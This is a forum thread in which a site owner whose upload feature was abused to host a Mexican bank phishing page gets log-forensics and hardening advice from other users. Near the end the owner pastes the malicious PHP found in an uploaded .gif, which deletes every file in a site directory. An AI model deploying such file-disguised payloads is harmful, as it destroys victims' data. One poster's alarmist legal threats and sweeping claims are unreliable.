One day I got this from my host: My site is using a self programmed admin panel (htaccess and userassword protected) for writing news, charts, lyrics, uploading pics, editing php files directly online.... People visiting the website were also able to submit news and upload pictures. which then had to be activated by the admin in the admin panel. Could this be the issue that someone uploaded those files and directories?
is this a dedicated box ? we can not really say what was the problem with out looking at the code what you need to do is check your files permission settings and scan your code for any holes if you have any 3rd party software make sure they are all up to date. make sure you check your site for any hidden iframes and remove them asap.
Go through your access logs and look for strange entries as well as bruteforce attempts (huge list of the same IP trying to access your admin panel over and over again).
in such warnings based on already existing abuse you normally should have a deadline of a few hours only. it is apparent that you have lacking knowledge and also gave too little info to help more precisely URL !!? to get real help you need to give facts of all SW - most efficient is URL to site! then: 1. ask politely your host for help specially date, time or details of security breach of your site 2. with that data you should then start a complete search of all your log files. i.e. apache error_logs access_logs /var/log/warn /var/log/messages >> search: grep "Invalid user" /var/log/messages you see a lot of lines similar to: Invalid user a from 62.123.192.212 Invalid user fluffy from 147.46.69.170 Invalid user admin from 147.46.69.170 Invalid user test from 147.46.69.170 these are hundreds or thousands of usual DAILY hacker attempts we all have on our machines make sure NONE of them was successful !! also go thru the mail logs !! visual search near and before date of incident. look / search for google referrers !!! from a months or several months back if you have limited knowledge then chances are you have been hosting cybercriminals many times look in ALL previous ( at least one year back ) access_logs for entries of files that do NOT belong to you look INTO ( open in editor !! ) all index.php files !!! look into access_logs for strings like - paypal - ebay etc ( all the typical phishing mails ) hackers often leave either files behind OR at least during the actual USEAGE of files you WILL have log entries !!! MEANWHILE until you found EXACT root-cause and SOLVED by securing, you seriously and instantly should: freeze all login SW either by disabling all SW, disable ALL upload of ANY and every kind of file !! chmod 000 all folders into admin sections and/or upoload sectiosn chmod 000 all interactive areas replace password login by server key login AND completely DISABLE sitewide all password login !! make a LIST - of all files, DOWNload all files for offline verification of FILE content hackers / phishers often use COMMON file names already existing in a normal site to change its content into a hacker content - such as for example index.php which often is the hackers admin panel with all functionalities. by doing above you may lose traffic - but may be able to save the site by being too negligent you may lose your site and your host correctly shuts down all - including YOU. specially since the planet has a rather poor reputation of hosting hackers and questionable sites and activities. cybercrime is something as serious like robbing a bank hosting cybercrime even if done out of gross negligence is as serious as the hacker-activities itself. hence ACT now, until solved, forget weekend and sleep, get coffee and use GOOGLE, search for security alert ( and add ONE by ONE every single piece of your installed SW ) to see which SW you have did have or does have known security bugs. scan your site using NESSUS !! - full scan. you get a huge output with lots of details. solve every security problem step by step. it may take you until near Christmas - it took me many hundred hrs when I was in your situation some 2 yrs ago.
Ok, all third party software is up to date! Secondly my friend who is managing the server is quite good. I dont have ssh access and will ask them for the logs, but they are so hughe, any command to just grep the logs for specific files or directories? I will try Nessus. I will also check for paypal and iframe stuff but i doubt there is something. Thanks for helping me a bit im so frustrated!
paypal is just one possibility of phishing site setup and since names or folders for a pp phishing site often do contain the word paypal - such log entries in OLD log files would be easy to find. other phishing site setups include most major banks such as citibank, ebay, amazon, etc anything that has online accounts and online login. if u understand the method of how hacker setup phishing site, then you also know how to search for ANY other phishing site or MASS-mailing setup on your site. keep in mind that your host HAD a complkait - complaints of that nature always are the result of existign EVIDENCE. hence you still HAVE a security hole in YOUR part of the site, NOT in the hosting/server part of the site. hosts/servers seldom or never are the risk factor the only risk ALWAYS is webmaster and his lack of knowledge to properly configure and secure HIS installed SW. for your info precise numbers from early year to yestgerday i had exactly 218937 brute force password crack attempts on my server ... thats a lot and you most likely have similar but never aware because out of YOUR control in addition to such sshd attcks there are a comparable number OTHER attempts - for me AND for you. you may most safely assume that YOUR site is UN-secured until the very moment when YOUhave actively secured your site in all aspects of SW usage beyond installing scripts. installing configuring scripts is the tiny part securing all is the real work of a webmaster latter part may take many hundreds of hrs study of all aspects of scripts installed by you on your server plus an equal period of tme to actually search/fid and secure all parts of your site. nessus is one possible powerful way to control and search for known security breaches searching ALL your log files - using tools and visually searching is the other method unless you have FOUND the entry point and understood the procedure used by hackers and have then fixed that how - your site and your host is compromised and still at risk. hackers come in intervals a few days active then weeks or moths passive to make you belief all is fine then another rush on your unsecured site ... year after year until you fixed all holes OR reduced the scope of www activities to a range that you fully understand and fully secure based on true existing knowledge i call that principle "always stay within your own limits" of what you know, understand and are able to fully control AND secure. NO need for any frustration this is a CHALLENGE to make you a better, more responsible and more secure webmaster!!!
just a quick reply, itsnt paypal or suich things, its boveda.banamex.com.mx/serban/emp/ something, only this was found on server and reported by host also, im not good at php or lunix yet, il study this later. at the moment im a stupid model travelling the world andnot having time at all. the logs are so hughe, any command to grep only the lines we need, from specific date or file?
fine for you paypal may have become much too tough to crack now. as I mentioned below ... etc ! hence NOW you know what to do hopefully having the files uploaded/reported 1. assuming you are a professional and have Linux offline as well, you do 2. CD to directory where you have ALL your past access_log files, then in shell zgrep "boveda.banamex.com.mx" access_log-2007*.gz >> hacker.txt (use ANY and every strong or path found by your host and reported to you by replacing above "boveda.banamex.com.mx" ! ) FYI - I am sure you already checked WHO the damaged party is - banamex.com.mx is a mexican bank = BANCO NACIONAL DE MEXICO and the mexican bank account holders may be the damaged person as a result of your cooperation to hsot hackers. hence a delay in YOUR securing your site may either bring Interpol to you or American law enforcement - depending on where you reside these hours and days. bank robbery is a crime in ALL countries of this planet - and what the hackers did is nothing short of a modern way to rob a bank = banamex.com.mx ! this above zgrep line may need to be adapted to your precise file name for access_log files but may be correct as is in default apache configuration. this a.m. copy/paste bash line does a complete search of ALL your 2007n access log files and writes the output into the text file hacker.txt then you see in above hacker.txt file the FIRST dates and the IPs used - with ALL the IP's found you do again a zgrep "xxx.yyy.zzz.aaa" access_log-2007*.gz >> hacker_IP_xxx.yyy.zzz.aaa.txt replace xxx.yyy.zzz.aaa by a correct IP used by the hackers, repeat above IP search for EACH IP now after all that search for the FIRST IP occurrence date + time then go with a regular text editor into that uncompressed access_log file of that date and SEARCH visually line by line back and forth around those minutes and seconds of the first occurrence of the hackers IP what URL on YOUR site did they visit first what was the referrer in their first visit then you should know the SW with the security bug and study thru Google all security alerts or configuration errors that made it possible for hackers to enter your site. RE your: "at the moment im a stupid model traveling the world and not having time at all." YES in deed you may be stupid to trow away your life. having a web site and having NO time - means YOU don't care about the real and total damage hackers may do WITH your active support and help. gross negligence, omission to secure your site very definitely may be considered by ANY smart court of law as CO-operation with hackers and some hackers may be simple terrorists hence you may be eligible for a visit by any law enforcement agency or home land security - unless you travel very fast into deepest bush and wait for a few decades or unless you really have no time and prefer to spend a few years behind bars ...!!??!!! if YOU have a site - then YOU also have a legal liability and responsibility to keep your site free from abuse by hackers and terrorists! if you really have no time then it would be your legal responsibility to ask your host TO SHUT DOWN your entire site! until you find time to do what you are responsible to do - your civil duties and responsibilities as a site owner and caring citizen of this planet's human society! think twice if you HAVE time on your own or if you want law enforcement authorities to GIVE / make you time ... it's your life and your FREEDOM at stake as well in addition to the wellbeing of any number of possibly damaged mexican bank account holders
Thanks mate. I did shut down the site until I solve this issue, Modelling I started because I had personal Problems I might was running away from and try to sort my life and thoughts while doing a bit more travelling. I dont see it as important. I know its my task and reliability and thats why the website is down! I respect, understand and know what u r talking about. And yes, I already paid upfront 1 year uni in Sydney to Study IT I'm not that stupid Thanks for all the info and wil let u know as soon as I have results. You are very helpful I must say. Thanks
i got similar problem before. What happened was that the hacker knows my password to my box. so he just log on as me and upload the phised site. so make sure you change your whole password including your email account. REMEMBER to reformated your pc or scan for virus. In my case, i think the guys know my email account and hence know everything from there. So now, I reformat the pc just incase.
What some hackers do, is they put a Shell(its a PHP script that acts like a FTP manager, DB manager etc.) code in a .GIF file and then upload it to your server, and then they locate it and use those commands of theres and they get root access. Maybe you should take that function out.
youi must be kidding using still password to access your box that was last millennium we did such - but these years we use serverkey controlled access and SSH !! how many password crack attempts did / do you have per year on your box ?? I had this year so far almost a quarter Million !! see my most recent blog article on site security sp360 that upload thing - that's the karma of/for all those who want others to fill their box and create all the content that brings the traffic and adsense-$ .. ! in my above security blog-article I have a full example fo how hackers attempt to abuse sites who allow uploads - to upload hacker stuff like the shell you mentioned or virus infected files in almost any format. preventive measure is to always and only create all your content yourself and thus to have no upload permission for anyone else but you - and then via ssh/sk. better have a smaller site but safe/secure and fun, then to have an oversized and out of control site that rocks you into copyright infringement and hackers hell. look at all those giants like blogger, blogspot, myspace, hi5, spaces.live, and the many picture "sharing" sites and forums, many grow so huge that they most likely need an attorney on 24/7 just to keep out of lawsuits due to all the illegal stuff going on on their sites. all the a.m. directly named blot/social sites are copyright infringers by the thousands each year - multiplied by thousands of other damaged creators of stolen / illegally uploaded to OTHER servers material - a truly dynamic and up-to-date attorney could start a huge class actions lawsuit in a federal law to once and forever stop such huge server abuse on inadequately controlled and poorly managed sites / servers. the damage done to owners of stolen material and damage created by hacked sites may go into a 2-3 digit Billion $/yr range easily. a reason more to stay clean and keen site and nights and off-hours so quiet and relaxing that you actually can enjoy life without having to fear some law enforcement knocking at your door for hosting hackers or cyber criminals ...
Thanks guys for all the info, i hope my mate is sending me the logs soon. I removed the upload function already and will change all passwords! Thanks But wouldn't the htpasswd thing protect my admin panel anyway? or is that easy to crack?
htpasswd has quiet little to NOTHING to do with th eway hackers crack your site if you look at some of the most recent security posts i have the last few days in my blog ( sig link ) then you find precise real life samples how hackers do things and non of these real life hack sceneries has anything to do with password at all but with script - securing and ( by hackers and the world ) KNOWN security vulnerabilities of popular scripts. most of these (bugs) are known but never the fixes applied because the site owners have far too little or NO understanding of all site/security relevant stuff. in most hacker cases such as yours and the last 10 or so i looked at during the past few days it always was a beginner-site, an easy MFA or so site where no considerable time has been invested to secure ALL scripts on system or on web space of a site. many are "just business" sites of ppl who just want to make money and have no time for such and belief that their host is doing their work for the 5-10 $ vhost fee / month ... site monitoring and securing PER months may easily take up to many DOZEN extra hours for a single site PER month. site securing starts with actually STUDY of installed scripts, what they do - how they do what they do, what additional members suddenly are allowed to do ... if MEMBERS can upload stuff, then most likely also hackers - just a matter of hacker's own creativity and experience. typical hackers are actually GOOD for you, because they invest as much time and efforts to hack your and other's site as site OWNER/operator SHOULD invest in running a site safely for all society. to operate securely / safely a site always is BEST done if you have instant and continuous 24/7/365 access to ALL logs LIVE - i.e. NOT the compressed ones after they are full, but the running ones, like all logs for - mysql - mail - warn - messages - apache erros - apache access etc for monitoring and finding the NEW was attempted by hackers in real time. old logs are for site forensic use only - like in your case. nessus will show you existing vulnerabilities as well as solutions to it by scanning all possible / existing scripts known to nessus for preventive security that again has nothing to do with the htpasswd stuff the htpasswd is just ONE out of ten thousands of possibilities to crack/hack a site.
I think i found it, i found a .gif file that was uploaded and contained <? echo "Ãðåâåä, Ãèêêà ðäåã!"; $dh = opendir("../../links"); while ($filename = readdir($dh)) { echo $filename."<br>"; unlink ("../../links/$filename"); } ?> Code (markup): How can u prevent this from happening other than disabling the ability to upload gif files? The date was Jan 17th so I need to wait stil till my mate sends me the logs. What would be the command to grep all log entries from that date?
to prevent avoid ANY and every upload !! or prevent execution of PHP - that is only possible if you are in a perl or HTML folder of your site. check passwords of any users - ban / delete users with insecure passwords !! NO warning else they may re-sing up with different name. use users/members with true names only and a few other general security measures. OTHERS here may have more help - i prefer strictly to stay within MY limits, hence on MY server ONE person only uploads - ME. to search when you got all your log files - search back in time - there might be OTHER hacker-visits by OTHER hackers as well long before that date or by same hackers but OTHER files. you may want to search the hackers IP back up to a year or more. a few steps you do - now it may be zgrep since old access_log files are all compressed. all else equal. 1. zgrep "your_gif_file-name.gif access_log-2007*.gz >>hacker_access.txt access_log-2007*.gz >>> that would be the exact apache2 format including date - in this search with wild card you search zgrep all log files starting first log file 2007 until last file. you also may go back to 2006. adapt precise file name to your precise log naming. that gives you as output written into the file hacker_"access.txt" all log lines that included the use of above found gif file. the oldest use is the most accurate to find the actual weak point in your system - the precise door or upload facility that causes your risk. of course by above zgrep you also find what IP or IPs hackers used when accessing that file. then you do another zgrep using the IP(s) related to the use of a.m. gif file - because hackers may have done much more than just use the file. do a zgrep "xxx.yyy.zzz.abc" access_log-2007-*.gz >>IP_list_hackers.txt replace xxx.yyy.zzz.abc b yth eactual IP if you have several IPs related to the use of above gif file, then repeat above procedure but wirte into a seperate file for each IP to have a better overview. then write down exact times - start to end of each "visit" then search thru other log files apache error_log plus /var/log/warn /var/log/messages and others ( mysql, mail, etc ) normally you have NO access to these additional logs - unless you are lucky like me and run a root server as your bride - bride because you spend your nights as much as your days with a root server !!! if NOW you have a friend on your hosting, you may get the a.m. additional logs if you explain why - and research exact seconds / minutes during visits to see what else they do/did. you may find surprises, hence better secure yourself in a chair with belt .... to avoid fainting or falling in coma. you may also ask your server-host to run a rootkit check to see if they are infected in their system as a result of your guests. you may find anything from more phishing sites, to chat bots, to mass mailing systems - most or all of these files may be deleted on your HDD but leave traces in your logs to be found with related IPs ... study this case exactly and in all aspects from all sides - it may become a most valuable real life learning scenario and it may result either in your decision to reduce the potential of your online activities to regain freedom to sleep and have leisure time - or to shut down entire sections of your site or to change your job or to become a security expert ... it may take you time - up to hundreds of hours for above, you will most likely do much just using your own senses, skipping thru all the grep found lines - but you have a unique situation to really learn and appreciate security for the future.
Oh wow, I thought .htaccess was pretty solid. Unless you had a weak password or something, who knows. I suggest you check out http://thefirewallscript.com though. Seems like a pretty solid script.